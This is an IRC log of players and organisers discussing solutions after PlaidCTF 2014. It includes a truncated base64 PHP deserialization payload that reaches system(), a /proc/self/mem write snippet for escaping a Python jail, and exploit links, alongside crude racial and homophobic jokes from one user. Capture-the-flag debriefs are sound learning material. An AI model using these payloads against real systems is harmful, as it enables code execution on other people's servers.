21:08 #pctf: < wtbw> because I'm sure it could e done much faster
21:08 #pctf: < wtbw> *be
21:08 #pctf: <+awesie> btw, i will post a blog post about the website issues and how we resolved them at some point
21:08 #pctf: < dkohlbre> choppers: literally did that and forgot it gets run
21:08 #pctf: < KT> what was the solution of "parlor"?
21:08 #pctf: < abuss> tomcr00se, dns magic?
21:08 #pctf: <@mserrano> did anyone like tiffany?
21:08 -!- shabgrd [~mostafa@unaffiliated/shabgard] has joined #pctf
21:08 #pctf: <@mserrano> tiffany was my favorite
21:08 #pctf: < iago-x86> awesie: That's awesome! Make sure you cc: shmoocon :)
21:08 #pctf: < choppers> dkohlbre: if you name your pokemon /bin/sh you get system("/bin/sh")
21:08 #pctf: < [CISSP]HoLyVieR> tomcr00se: What SQLi did you use for WhatApp, the only table I could leak with 64 caracters was comments ?
21:08 #pctf: < tomcr00se> awesie: harry_potter after you have rop?
21:08 #pctf: < keidii> anyone solve BBOS here ??
21:08 #pctf: < Ymgve> KT: server lies, nonce is used repeatedly, so hash extension
21:08 #pctf: <+tylerni7> <3 awesie and cai_ for making the site work
21:08 #pctf: < zoku> mserrano: tiffany was fucked
21:08 #pctf: < zoku> mserrano: did you write that too?
21:08 #pctf: <@mserrano> yes
21:09 #pctf: < tomcr00se> [CISSP]HoLyVieR: i guessed (select * from flag) :P
21:09 #pctf: < okami41> mserrano: tiffany was a lot of fun, it took me forever though!
21:09 #pctf: < ryan-c> https://gist.github.com/anonymous/10602398#file-pctf2014-rsa450 < rsa writeup
21:09 #pctf: < [int3]romansoft> <sven> heh, zfs was fun. aDR4eA solved that one in ~10 minutes :D -> wtf!!! How did you find key.xor_encrypted amd xor_key contents? Offsets of them?
21:09 #pctf: < wtbw> mserrano: well I said "what about 'breakfast at tiffany's'?"
21:09 #pctf: < mak`> what was correct solution to zfs?
21:09 #pctf: <+awesie> tomcr00se: you should've been able to just use system(...) to run commands
21:09 #pctf: < ryan-c> tylerni7: ^^^
21:09 #pctf: < Ymgve> keidii: SHA1 hashes of device password in nvram
21:09 #pctf: < okami41> i kept wanting to set breakpoints
21:09 #pctf: < mak`> without brute?
21:09 #pctf: <@mserrano> I wrote ezhp, tiffany, mtpox, kpop, hudak, moscow, wheee, twenty, mult. is hard
21:09 #pctf: < keidii> Ymgve , och
21:09 #pctf: < spq> hy, thanks for the nice ctf
21:09 #pctf: < [CISSP]HoLyVieR> tomcr00se: oh wow ... :/
21:09 #pctf: < tomcr00se> awesie: but how to find libc?
21:09 #pctf: < dkohlbre> choppers: yeah I had that, godammit I was so tired and looking for a write, somehow ignored I was writing a function pointer that i knew
21:09 #pctf: < upb> grrrrr wtf
21:09 #pctf: < bool101> wow mserrano nice
21:09 #pctf: < dkohlbre> choppers: ah well ty
21:09 #pctf: <+awesie> tomcr00se: you could leak libc address
21:09 #pctf: < tomcr00se> before socket shutdown?
21:09 #pctf: < iago-x86> mserrano: I solvee ezhp, mtpox, and kpop :)
21:09 #pctf: < ryan-c> tomcr00se: did you write an attack for rsa from scratch or use the c poc by the people that wrote that paper?
21:10 #pctf: < tomcr00se> i could either leak libc address OR use libc address
21:10 #pctf: < Ymgve> mserrano: was there some agreement to use city names for VM tasks? :)
21:10 #pctf: < bool101> liked that problem awesie
21:10 #pctf: <+awesie> tomcr00se: don't shutdown the socket, you could get the argument to new() to be -1
21:10 #pctf: < rray> iago-x86: how did you solve kpop? wob was too hard
21:10 #pctf: < tomcr00se> ryan-c: lol poc of course
21:10 #pctf: < zoku> iago-x86: what was your ezhp solution?
21:10 #pctf: <@mserrano> Ymgve: I named both of them :P
21:10 #pctf: < foundation> do you guys know who runs chandler tor node ?
21:10 #pctf: <+awesie> tomcr00se: if you have a string of the form: AAAA...PASSWORD
21:10 #pctf: < Ymgve> paris was nasty
21:10 #pctf: <+houqp_> foundation: yeah
21:10 #pctf: < abuss> How did nightmare work? I did try read/write to /proc/self/mem but it gave me i/o error
21:10 #pctf: <@mserrano> paris was a great problem
21:10 #pctf: < iago-x86> rray: kpop = take advantage of preg_replace()'s /e extension
21:10 #pctf: < foundation> he's gonna be scraching his head over this weekend i guess :)
21:10 #pctf: < tomcr00se> awesie: ahh, i missed that, and new will throw
21:10 #pctf: <+houqp_> foundation: we contacted the operator before hand :)
21:10 #pctf: <+awesie> tomcr00se: yep
21:10 #pctf: < wtbw> I really liked that Paris was "clean", other than SEH usage
21:10 #pctf: < foundation> houqp_: cool
21:10 #pctf: < wtbw> no bs, just complication
21:10 #pctf: <+awesie> w/in 7
21:10 #pctf: < blagh> how did mtpox work? I never managed to pull it off
21:10 #pctf: <+awesie> ugh
21:10 #pctf: < rray> iago-x86: i was trying to exploit that at one point, but i couldn't control what went into preg_replace
21:10 #pctf: < iago-x86> zoku: It was basically owning a linked list, I think?
21:11 #pctf: < rray> i guess i'll wait for the writeup
21:11 #pctf: < spq> abuss: i made it with python bytecode to x86 shellcode
21:11 #pctf: <+houqp_> foundation: they were very happy with that :)
21:11 #pctf: <@mserrano> blagh: hash extension -> sql injection
21:11 #pctf: < ryan-c> tomcr00se: it took a while for me to think to look for a poc, people who write papers rarely release code
21:11 #pctf: < iago-x86> rray: You can control it via deserializing $_COOKIE['lyrics']
21:11 #pctf: < rray> 0_0
21:11 #pctf: < KT> <Ymgve>: but you dont know the highest 28 bits of the hash, so how do you extend it?
21:11 -!- jn__ [bert@bitcoinshell.mooo.com] has joined #pctf
21:11 #pctf: <@mserrano> rray: look up stefan esser's slides on POP chains
21:11 #pctf: < Ymgve> KT: brute force
21:11 #pctf: < ryan-c> anyone else here get parlor?
21:11 #pctf: < rray> ... i did that, but i did it wrong haha
21:11 #pctf: < iago-x86> Haha
21:11 #pctf: < iago-x86> I actually used a whiteboard to draw the object structure
21:11 #pctf: < KT> Ymgve: ok, true, nice :D
21:11 #pctf: < iago-x86> Good times
21:11 #pctf: * iago-x86 signs off
21:11 #pctf: < Ymgve> KT: do two guesses in sequence then use brute force locally to find the remaining bits
21:11 #pctf: < iago-x86> (metaphorically)
21:11 #pctf: <@mserrano> Tzo2OiJMeXJpY3MiOjI6e3M6OToiACoAbHlyaWNzIjtzOjQ6ImFzZGYiO3M6NzoiACoAc29uZyI7Tzo0OiJTb25nIjo0OntzOjk6IgAqAGxvZ2dlciI7Tzo2OiJMb2dnZXIiOjE6e3M6MTI6IgAqAGxvZ3dyaXRlciI7TzoxNDoiTG9nV3JpdGVyX0ZpbGUiOjI6e3M6MTE6IgAqAGZpbGVuYW1lIjtzOjg6InNvbWVzaGl0IjtzOjk6IgAqAGZvcm1hdCI7TzoxMzoiTG9nRmlsZUZvcm1hdCI6Mjp7czoxMDoiACoAZmlsdGVycyI7YToxOntpOjA7TzoxMjoiT3V0cHV0RmlsdGVyIjoyOntzOjE1OiIAKgBtYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNDoiACoAcmVwbGFjZW1lbnQiO3M6MzU6InN5c3RlbSg
21:11 #pctf: < rray> mserrano: i was looking at the article he wrote, in retrospect i was actually quite close :P
21:11 #pctf: < abuss> spq, nice, got a writeup? I tried to build bytecode that would call os.system but I couldn't get import to work
21:12 #pctf: <@mserrano> importing that
21:12 #pctf: <@mserrano> oh shit that got truncated
21:12 #pctf: <@mserrano> oh well
21:12 #pctf: <@mserrano> would get flag
21:12 #pctf: < whois> who know bbos ?
21:12 #pctf: < deject3d_> where writeups
21:12 #pctf: < foundation> was there an easy way of solving g++ , those c++ templates ?
21:12 #pctf: < abuss> ryan-c, curious how? I spent an hour or so on that but couldn't find any way to predict output
21:12 #pctf: <@mserrano> http://paste2.org/Nn46z87k <- import this on kpop, obtain flag
21:12 #pctf: < zoku> iago-x86: yea, had to overflow one buffer to write to the linked list
21:12 #pctf: < spq> abuss: i'll see
21:12 #pctf: < Ymgve> whois: SHA1 hashes of device password in nvram
21:12 #pctf: < abuss> it wasn't a lcg as far as I could tell
21:12 #pctf: < tomcr00se> foundation: dynamically
21:12 #pctf: < comex> foundation: i tried z3 but it didn't work :p
21:12 #pctf: < ryan-c> abuss: hash length extension attack
21:12 #pctf: < blagh> mserrano: Well, I was going down a completely wrong path
21:12 #pctf: < whois> Ymgve // Thx, !
21:12 #pctf: < abuss> god dammit I really need to figure out how those work
21:12 #pctf: < abuss> haha
21:12 #pctf: < ryan-c> abuss: you can get the last 100 bits of the md5
21:13 #pctf: < yyyyyyy> sooooo..... guys.... anyone solved the almost-feistel cipher?
21:13 #pctf: < ryan-c> abuss: extend it blind
21:13 #pctf: < zardus> great ctf, guys
21:13 #pctf: < marcoscars02> ryan-c, awesome write
21:13 #pctf: <@mserrano> yyyyyyy: :)
21:13 #pctf: <+tylerni7> btw, who solved RSA? curious how you did it?
21:13 #pctf: <@mserrano> yyyyyyy: Slide attack
21:13 #pctf: < NK_> never saw a ctftime update as quickly
21:13 #pctf: < NK_> :)
21:13 #pctf: < foundation> tomcr00se: dynamically ? i tried to mess with recursion depth , to figure out something ...
21:13 #pctf: <+tylerni7> apparently there was code posted :(
21:13 #pctf: < zardus> my favorite was harry potter :-)
21:13 #pctf: < [int3]romansoft> please, offsets of key.xor_encrypted and xor_key (zfs)???
21:13 #pctf: <@mserrano> yyyyyyy: you can reverse a single double-round in <= 4096 iterations
21:13 #pctf: <+tylerni7> I wanted people to solve themselves
21:13 #pctf: < tomcr00se> tylerni7: the code from the paper
21:13 #pctf: < ryan-c> abuss: and brute force the other 28 bits to find something that resulted in a matching second hash
21:13 #pctf: < abuss> tylerni7, kmowery
21:13 #pctf: <+tylerni7> tomcr00se: damn
21:13 #pctf: <@mserrano> yyyyyyy: and then using ~512 plaintexts you can reliably get a slid pair
21:13 #pctf: <+tylerni7> tomcr00se: I didn't know about the code D:
21:13 #pctf: <+tylerni7> someone else linked me to it
21:13 #pctf: < abuss> nice okay
21:13 #pctf: < ryan-c> marcoscars02: It's a quick shitty writeup, lol will make a better one later
21:13 #pctf: < tomcr00se> tylerni7: wait you really wrote that attack?
21:13 #pctf: < fuzyll> tylerni7: tomcr00se: what paper?
21:13 #pctf: <@mserrano> tomcr00se: yeah, he did
21:13 #pctf: <+tylerni7> tomcr00se: yeah I have it in python
21:13 #pctf: <@mserrano> it's pretty cool
21:14 #pctf: < marcoscars02> awesome code ryan-c
21:14 #pctf: < marcoscars02> :O
21:14 #pctf: < sven> i think segher wrote his own code too after reading the paper
21:14 #pctf: < ryan-c> fuzyll: http://cseweb.ucsd.edu/~hovav/papers/hs09.html
21:14 #pctf: < geobot> yeah ucsd revealed themselves
21:14 #pctf: <+tylerni7> sven: :) good
21:14 #pctf: < sven> not sure though :)
21:14 #pctf: <+tylerni7> geobot: yes.. they did
21:14 #pctf: <@mserrano> sven: how did DS get wheee?
yyyyyyy> mserrano, I actually didn't know that attack... :/ thanks for explaining
<mserrano> sven: did you guys actually do the 26**3 requests?
<@ryan-c> I got part way through writing my own code from the paper too
abuss> tylerni7, the best part is that our crypto guy didn't see that link
<tomcr00se> what was the wheee solution?
abuss> and spent quite a while writing from scratch
<mak`> zfs anyone? ;]
<mserrano> tomcr00se: http://www.theamazingking.com/crypto-slide.php
<@abuss> and then noticed it after submitting flag :P
dkohlbre> tylerni7: the best part is that he IS HOVAV'S GRAD STUDENT
<abuss> ^^^^
<sven> mserrano: uh.. i know that someone implemented the slide attack, dunno how many requests we sent though
mserrano> sven: ah cool
mserrano> someone was gonna do 26**3 blocks
<@sven> :D
<ryan-c> abuss: he wrote a solver from the paper then found the source?
<mserrano> but you can do it in < 512; I got it with 256
<@tylerni7> dkohlbre: haha whatt
<+mserrano> (aka a single request)
<@tomcr00se> grr, yea, i figured it was something like this, but i was too tired this morning
<whois> whats tor(rendezvous) prob?
<tylerni7> that's geat
<+sssssssss> how to solve halphow2js?
<dkohlbre> tylerni7: yeah, he grabbed the paper, wrote a new impl, and THEN noticed the impl by hovav
<mserrano> dkohlbre: LOL
<@tylerni7> dkohlbre: that makes me so happy
dkohlbre> sooo now we have 2
<clockish> :D
<tylerni7> lol
<+asmoday> HEY whats the next CTF
<mathiasbynens> halphow2js write-up https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js
<whois> using chandler router to connect onion ?
<marcoscars02> asmoday, sqli
<tylerni7> asmoday: ctftime.org
<+marcoscars02> xD
<asmoday> so that site is up to date
<mathiasbynens> heartbleed write-up: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/heartbleed
<tylerni7> yeah
<+Ymgve> How do you specify a router to use as a rendezvous point?
<wtbw> thanks again guys :)
<foundation> whois: yes, you had to patch the tor source to make sure it uses chandler as rendezvous point
<ryan-c> whois: you have to modify tor in a couple places - first to handle an unencryped list of intro points, then to force using chandler as a rend point, then to include beef in the rend cookie
<mathiasbynens> multiplication is hard write-up: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/multiplication-is-hard
<ryan-c> Ymgve: you have to modify the tor source code
<asmoday> multiplication is hard, oh the memories
<foundation> Ymgve: source patching
<Ymgve> ryan-c: was afraid of that
<whois> oh ,,
<== wtbw [~wtbw@unaffiliated/wtbw] has quit []
jix> ryan-c: unencrypted list of intro points?
<ryan-c> it was a pain in the arse
<jix> ryan-c: I didn't have to do that
<== oceanx_ [~oceanx@] has quit [Ping timeout: 276 seconds]
pipecork> mathiasbynens: lol
<ryan-c> jix: hm
<jix> only chandler as rend point and beef as cookie
<mathiasbynens> pipecork: the real tough ones :')
<jix> but it was painful
<mathiasbynens> please add links to your write-ups here https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014
<jix> especially chandler as rend point
<abuss> oh my god that jshalp
<abuss> 0.0
tomcr00se> i loved jshalp
<dkohlbre> ok time to go home, ty ppp
<sven> freya annoyed me the most. especially 'cause all i did was recompile openssh in the end to make it work :<
<awesie> dkohlbre: thanks for playing :)
<+sdjakl> re wheeeee, i wrote the slide attack. we used 256 blocks
<sdjakl> (for whoever was asking sven)
<mathiasbynens> tomcr00se: did you solve it the same way? https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme
<clockish> abuss: do you know how to js
<abuss> clockish, so what did mystop do? I spent HOURS trying to reverse and black box it
<sven> mserrano: ^--
<ryan-c> anyone do a writeup of curlcore?
<abuss> clockish, LOLNO
<clockish> abuss: i don't either
abuss> it was like the collatz function
<abuss> but with an exception
<mserrano> tomcr00se: anyone else wondering: https://gist.github.com/mserrano/54465a80ffe75739d2ee
<@abuss> that had an exception
<tylerni7> ryan-c: use something to search for aes key schedule
<+mserrano> sven: sdjakl: cool
<@mathiasbynens> clockish, abuss: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme
<tylerni7> then cbc
<+tylerni7> :P
<+ryan-c> tylerni7: goddamnit
<ryan-c> really?
<clockish> abuss: yeah, exactly. I just modified the collatz function with some shit
<ryan-c> I threw aeskeyfind at it first thing
<mserrano> (that gist uses 512 blocks, but you can use 256 and it will work with very high probability)
<@ryan-c> and got an aes key
<geobot> ah, thought it will win 8 to search for aes key schedule
<mserrano> (csol is just a C implementation of the cipher)
<@tylerni7> ryan-c: yeah, aeskeyfind may not work, but some tools do
<+tomcr00se> too tired to even read that :P
<marcoscars02> steg writeup?
<marcoscars02> :DD
<Pitr_> why was the memory layout in curlcores dump different from gnutls_int.h ?
<clockish> mathiasbynens: yeah, good write up, that's basically the intended solution :)
<sdjakl> a
<tylerni7> marcoscars02: randomize the palette
<+ryan-c> aeskeyfind gave me 68f946e9c1fd339eec04fc048e651ba7642ee8df2519aaf308ab567f7e4bc231
<tylerni7> then reopen image
<+tylerni7> ryan-c: there are 2 keys
<+ryan-c> next to some asn1 structures
<Beched> lol people say that penthackon team cheats like ASSholes asking ppl for hints or flags, pretending they are some poor small team in the bottom of scoreboard. And they post FAKE flags in PM LOL
<tylerni7> one for encrypting, one for decrypting
<+tylerni7> (each side of the connection)
<+_blasty_> LOL Beched
<sven> :D
<ryan-c> tylerni7: you mean one for server->client and one for client->server?
<== Valion [~Valion@c-75-70-225-60.hsd1.co.comcast.net] has joined #pctf
rray> thx ppp, it was a cool ctf
<Ymgve> I think Beched got burned
<tylerni7> ryan-c: yep
<+arthurdent> tylerni7: how do you randomize the pallete?
<mserrano> rray: :)
<@Beched> Ymgve: ??
<tylerni7> arthurdent: open it up in something like 010
<+abuss> yeah, great problems! can't wait until I can do more than 10% of them :P
<tomcr00se> mathiasbynens: sort of, i did "+6"
<Adran> marcoscars02: Have you played with StegSolver? :)
<marcoscars02> zsteg
<marcoscars02> :S
<== yyyyyyy [~yyyyyyy@] has left #pctf []
marcoscars02> and a lot of brain xDD
<sdjakl> l/win 18
keidii> any ZFS solution other than brute ?
<== D3AdCa7_ [d220a27e@gateway/web/freenode/ip.] has joined #pctf
tylerni7> keidii: yes... but it was a pain
<+ryan-c> for steg, we just dicked around with setting all colors in the pallet except one to black
ryan-c> and found an interesting range of pallet entries
<inter> tylerni7: do you know who made tenement?
<mak`> tylerni7: tell me
<keidii> tylerni7 , i droped reading zfs src/doc after few hours
<tylerni7> inter: gbarboza
<+mak`> i spend a lot h on this
<== Rexperience7 [~Rex@unaffiliated/rexperience7] has joined #pctf
mak`> and got nothing at the end
Adran> i just randomized the colors and was able to make out all but the 'keep' part originally
<pd7> what tool did you use to randomize the colors?
<Adran> stegsolve
<mak`> how one can find file if there is no data in dnode table?
<pd7> thanks
<ciliated> how to solve kpop?
<mak`> ciliated: unserialize nad preg_replace
<Adran> ciliated: http://paste2.org/Nn46z87k
<abuss> anyone got a nightmare writeup?
<mathiasbynens> clockish: nice! there must be a better way to find input groups for halphow2js rather than trial and error though
<abuss> I heard you were supposed to write to /proc/self/mem but I got i/o err
<clockish> abuss: write to /proc/self/mem
<clockish> oh
clockish> you have to write corectly
<clockish> like, turn off buffering
<abuss> oh hmm
Ymgve> what was the solution to freya?
<mibbit_19028> solution to pwn 100?
<clockish> mathiasbynens: heh, not really, just once you realize you can do it with small numbers you just play around
<robbje> mak`: same here :>
<Pitr_> tyler, what did i miss on curlcore?
<inter> mserrano
<inter> how did i
<inter> misread
<ryan-c> tylerni7: How's the reading interface on parlor built? Is it basically dependent on the nonce being in a single packet?
<inter> 1 with l
<mak`> robbje: you did it?
<mathiasbynens> clockish: ok cool, thanks for confirming
<inter> i still cant believe it
<tylerni7> ryan-c: dude I dunno
<+tylerni7> it's just simple python
<+tylerni7> I wrote it as simply as possible :P
<+robbje> mak`: no :(
<foundation> Pitr_: what did you do on curlcore ?
<mak`> tylerni7:
Rexperience7> how to solve tenement
<mserrano> inter: :
<@robbje> i just wasted hours on it
<mserrano> (
<@ryan-c> tylerni7: You're just doing a socket read?
<Pitr_> why was the memory layout in curlcores dump different from gnutls_int.h
<robbje> Rexperience7: google egghunter
tylerni7> ryan-c: yeah
<+Sin__> Rexperience7, just dump the whole memory and do strings
<gbarboza> Rexperience7: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
<+foundation> i dumped the heap and searched for somethign resembleing the client random , first part you can take from ssl packet
<tylerni7> if it's multiple packets it might get sad (as in it'd just read the first one)
<+Rexperience7> oh
<Rexperience7> EGGHUNTER
<[pwn]Idolf> FUCKING HELL
<Rexperience7> OHHHHHHH
<dickoff> Streaming question, do people care about the video part of plaidTV or just the music
<+[pwn]Idolf> We got code exec on the python jail now
<[pwn]Idolf> 28 minutes too late
<inter> dickoff: you should stream
<Pitr_> foundation: i checked the order in the geaderfile
<inter> of yo uguys
<Sin__> what plaidtv ?
<[pwn]Idolf> what was the intended solution?
<inter> suffereing from 502 erros
<mathiasbynens> [pwn]Idolf: what’s your exploit look like?
<ryan-c> tylerni7: yeah, it didn't work when i tried to send stuff through netcat which breaks into packets by line.
<mak`> dickoff: both
<ricky> Sin__: It's a video/audio stream dickoff did last year
<+mserrano> [pwn]Idolf: use /proc/self/mem to overwrite a function pointer
<@robbje> mserrano: i think we solved it differently :)
<muchacho> mserrano, how do you call "someshit"-file ?
<ryan-c> tylerni7: worked when i used python and socket.sent
<ryan-c> er
<Sin__> like at the defcon quals? that would've been nice
<ryan-c> send
<tylerni7> ryan-c: yeah
<+mserrano> robbje: did you guys use a code object?
<@sven> so, i'm curious, how was zfs supposed to be solved?
<[pwn]Idolf> mserrano: wtf, can you write using /proc/self/mem?
<[pwn]Idolf> We tried that :/
<tylerni7> sven: zfs stuff...
<+robbje> mserrano: i think so
<robbje> the exploit is huge and ugly :>
<geobot> its ugly though
<abuss> dickoff, did I miss a link to plaidtv?
<tylerni7> sven: frozencemetery and awreece know how
<+mserrano> [pwn]Idolf: yeah, you have to set the modes correctly and shit
<@ryan-c> also fuck debugging endienness issues
<abuss> 48 hours ago? :P
<mserrano> robbje: :) that's how clockish did it
<@dickoff> abuss: I didn't do it this year
<+abuss> ah k
<[pwn]Idolf> mserrano: ..... open("/proc/self/exe", "w")?
<== nUl1 [5d9dadb6@gateway/web/freenode/ip.] has quit [Quit: Page closed]
mserrano> open("/proc/self/maps", "r+b")
<@clockish> robbje: you used a code object? <3
<mserrano> you also have to set buffering to zero or something
<@robbje> clockish: spq did it, yeah
<abuss> ahhh
<[pwn]Idolf> mserrano: what-the-shit.... that's not at ALL how we solved it :D
clockish> [pwn]Idolf: what did you do?
<[pwn]Idolf> mserrano: I'm considering sharing the exploit, but that would ruin a CTF-problem I'm designing :P
<geobot> priv escalation vulnerabilities ruin it all
mserrano> [pwn]Idolf: lol
<@tylerni7> [pwn]Idolf: awww
<+mserrano> I thought we would finally kill python jails
<@abuss> I was reading all the /proc/self/ stuff but only tried to write to mem
<tylerni7> [pwn]Idolf: just share it with us then ;)
<+mserrano> with last year and this year
<@dickoff> inter: mak` I'll bring it back in some fashion next year
dickoff> doing videos is way more annoying than music
<+[pwn]Idolf> mserrano: well, I guess your solution is more general... but WHAT IF WE DIDN'T EVEN HAVE STDOUT?!? :D
<muchacho> mserrano, how do you call "someshit"-file in kpop? What is the path?
<Pitr_> we need more perl chals
mserrano> muchacho: you don't need to call a file
tylerni7> Pitr_: that can be arranged
<+sven> i want more non-x86 pwnables
<clockish> [pwn]Idolf: I for one am super curious what you did :)
<robbje> ban Pitr_
<asmoday> IPV6
<Tapyroe__> any one want to briefly tell me how to solve mt pox? XD
<robbje> :>
<mserrano> muchacho: in fact it doesn't successfully write to that file
<@tylerni7> sven: we'll see... that requires not EC2 for hosting
<+Pitr_> great!
<abuss> oh I also wanted to say that I liked reekeeee
<jix> or nen x86 reversing
<sven> tylerni7: qemu on ec2 should work :)
<abuss> it felt like a really solid web problem
<mserrano> muchacho: instead it uses preg_replace("/stuff/e", "phpcode()")
<@clockish> [pwn]Idolf: Given that I wrote the chall and couldn't find any other holes...
<tylerni7> sven: well.. qemu isn't the best
<+Pitr_ trapt robbje in zijn ballen :D
* Sin__> Tapyroe__, hash length extension
<hammerpig> many thanks for ctf
sven> tylerni7: ah, fair enough. it probably requires quite some cpu power if all people are trying to pwn it at the same time
<mibbit_19028> tiffany was a pain all that antidebugging!
<== alex___ [b2c22e8b@gateway/web/freenode/ip.] has joined #pctf
tylerni7> also annoying qemu bugs sometimes crop up
<+[pwn]Idolf> clockish: ok, sure... I'll upload it not
<muchacho> mserrano, ah k damnit, thx!
<Tapyroe__> Sin__: thanks!
<[pwn]Idolf> clockish: https://gist.github.com/anonymous/dff51e9ec27deb828e1d
<Pitr_> & thanks again, see you next year!
<mserrano> [pwn]Idolf: ok, so you used a code object
<@mserrano> ok
<@inter> tylerni7 so what was the solution to rsa?
<clockish> [pwn]Idolf: oh, a code object. Yeah, that was another way to do it.
<inter> i had a chunk of code for it
<inter> but didnt work
<mserrano> inter: there's a paper
<@mserrano> they have a description of an algorithm
<@clockish> [pwn]Idolf: good work!
<mserrano> either find an implementation or write one
<@mserrano> obtain flag
<@tylerni7> inter: well... I wrote code from scratch... there is source that mostly works online though :(
<+tylerni7> that I didn't know about (:
<+inter> r
<inter> o
<inter> f
<tylerni7> :(*
<== makler2004 [~chatzilla@adhg69.neoplus.adsl.tpnet.pl] has quit [Quit: ChatZilla [Firefox 28.0/20140314220517]]
inter> aint nobody got time fo dat
<inter> jk
<inter> i sometimes wish i was black female
<inter> so i can say that
<inter> no racism
<== Zibro [~zibro@tu132135.ip.tsinghua.edu.cn] has joined #pctf
clockish> [pwn]Idolf: code obj is the more leet way to do it :)
<[pwn]Idolf> clockish: /proc/self/mem was one of the first things I tried :/
<clockish> [pwn]Idolf: yeah, I thought more people would use proc/self/mem because it is easier.
<inter> clockish: your challs require too much creativity
<clockish> inter: :D
<inter> its too much for non-cs major kid
<inter> :/
<== Hertle [~Hertle@host74-2.natpool.mwn.de] has quit [Ping timeout: 245 seconds]
clockish> [pwn]Idolf: yeah, you need f = file('/proc/self/mem', 'r+b', 0); f.seek(i); x=f.read(l) to make it work
<abuss> 0 for unbuffered?
<clockish> abuss: yes
<[pwn]Idolf> clockish: when it didn't work initially, I found somewhere on the web that said you apparently couldn't do it :/
<jjk_> to the zfs - i constructed a new uberblock pointing to newer blocks and used ufs explorer to extract the data (as it ignores the checksums)
<mserrano> it depends on your system :(
<@clockish> [pwn]Idolf: :/
<[pwn]Idolf> I tried "rwb"
<mserrano> jjk_: that was the intended solution :)
<@dickoff> so how big of a party is 0xffa throwing?! _blasty_, ius, iZsh, etc
<+== mibbit_19028 [4a780f96@gateway/web/cgi-irc/kiwiirc.com/ip.] has quit [Quit: mibbit_19028]
clockish> [pwn]Idolf: yeah, it works on every machine I've tried it on, except for mserrano's :P
<== random_user_23 [5d6846fd@gateway/web/freenode/ip.] has quit [Quit: Page closed]
mserrano> yeah it fails on my droplet
<@[int3]romansoft> jjk_: can you elaborate on that? (zfs)
<== mode/#pctf [+v clockish] by mserrano
== mode/#pctf [-o mserrano] by mserrano
jjk_> mserrano: it took me a while to notice the uber-corruption in challenge description :)
<== Pause [~PauseSave@ip68-98-14-13.ph.ph.cox.net] has quit []
mak`> jjk_: im zfs n00b could you elaborate?
<poppopret> anyone got a g++ writeup?
<tylerni7> poppopret: well
<+cai_> thanks for leaving feedback. they greatly help us to improve pctf every year :)
<+tylerni7> basically it does matrix multiplication on your key over gf(257)
<+cai_> if you haven't done it yet, please take our survey: http://bit.ly/1ifQBOo
<+dickoff> ^^^
<+mak`> i was trying to find metadata like here: http://www.joyent.com/blog/zfs-forensics-recovering-files-from-a-destroyed-zpool
<tylerni7> poppopret: not quite a writeup, but yeah that's how it verified your key
<+inter> anyways
<mak`> but find only zap with file names and id
<inter> i has my writeup in very very short point form
<mak`> and there was no data in dnode tables
<mak`> at this id
<jjk_> i can recommend ondiskformat.pdf for zfs structure
<poppopret> ahhh
<poppopret> ok
<inter> gg is gay
<poppopret> thanks tyler
<== sibios [~sibios@unaffiliated/sibios] has quit [Quit: Leaving]
<+tylerni7> poppopret: I'm sure someone will post a better writeup for it
<+mak`> yeah was reading it
<== c1l0 [~c1l0@c-98-248-187-55.hsd1.ca.comcast.net] has joined #pctf
irctc736> anyone has a writeup on bronies?
<foundation> tylerni7: please tell me you didn't write that by hand
<Sin__> clockish, was there a better way ?
<tylerni7> foundation: I... did
<+== AnthraX101 [~asdf@23-25-135-9.seattle.securityinnovation.com] has quit []
tylerni7> iteratively, but by hand
<+inter> clockish: yep 4 bytes a type
<cai_> we'll soon make a page that lists all the write-ups submitted to us (via email or dropped in IRC)
<+clockish> Sin__: for g++? yeah, read the code and understand that it's GF(207)
<+clockish> But math is hard.
<+jjk_> mak`, [int3]romansoft and here is my ugly python code to find uberblocks - http://pastebin.com/Y14B2RAh
<inter> pos 0,4,8,12
<Sin__> it is
<inter> but then
<jmgrosen> so, how do you do bronies part 1? that's been bothering me
<poppopret> where do we submit writeups to?
<inter> i misread
<inter> 1 as l
<inter> or
<sven> "see suspicious file name, figure out it's two files XOR'ed together, find out a suspicious block just before the file name, xor that with whole file, strings. profit"<-- how aDR4eA solved zfs :)
<inter> l as 1
<inter> and lost the breakthru
<inter> fuckkk
<clockish> Sin__: So i'd say brute force is actually the better solution :P
<+jjk_> and the missing blocks
<abuss> cai_, fixed mine: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
<shabgrd> I think half the world solved crypto 20 expect for me :(
<[int3]romansoft> cai_: for next year, a simple board that lets up read the problems and send the flags. No more is needed.
<geobot> oo i like skier_ too late to make friends at the ai is littered with you have a lot of simple binaries(no arm, x86-32)
<poppopret> where do we submit writeups to?
<tylerni7> [int3]romansoft: it's what happens when we try to innovate :(
<+abuss> Hmm I liked the fancy board and the voting mechanics
<clockish> poppopret: nothing PPP official, but there's a CTFs writeups github that aggregates writeups
<+poppopret> ok
<[pwn]Idolf> clockish: the main reason our exploit didn't work? We had a '|' instead of a 'd'
<phiber__> innovating is fine, but please have a fallback simple interface
<abuss> it worked surprisingly well across my devices
<cai_> [int3]romansoft: you might actually get that. i'm quitting after this one is wrapped up.
<+mserrano> [pwn]Idolf: awwwwww
<+tylerni7> poppopret: if you put them in here we'll try to keep up with them
<+== alex___ [b2c22e8b@gateway/web/freenode/ip.] has quit [Ping timeout: 240 seconds]
[pwn]Idolf> mserrano: ok, I'll stop whining now and go to bed :P
<tylerni7> cai_: <3
<+tylerni7> :(
<+phiber__> I didn't know you could switch the board to see more problems until 8h passed
tylerni7> upb: yeah, standard for django
<+upb> ah
<tylerni7> maybe more as well
<+abuss> upb, I had just spent a while on reekeee
<abuss> which was very similar
<phiber__> the mourse cursor doesn't change when hovering over any clickable thing
<deject3d> what was the solution to reekee anyway
<jmgrosen> anyone have a writeup of part 1 of bronies up yet?
<deject3d> or at least where was the flag
<iago-x86> I just realized I haven't eaten today :)
<Dumpling> https://github.com/isislab/CTF-Solutions/tree/master/PCTF_2014 <- solutions for mtpox, kpop, and kappa
<abuss> deject3d, after getting the secrets.py
<abuss> you can forge cookies
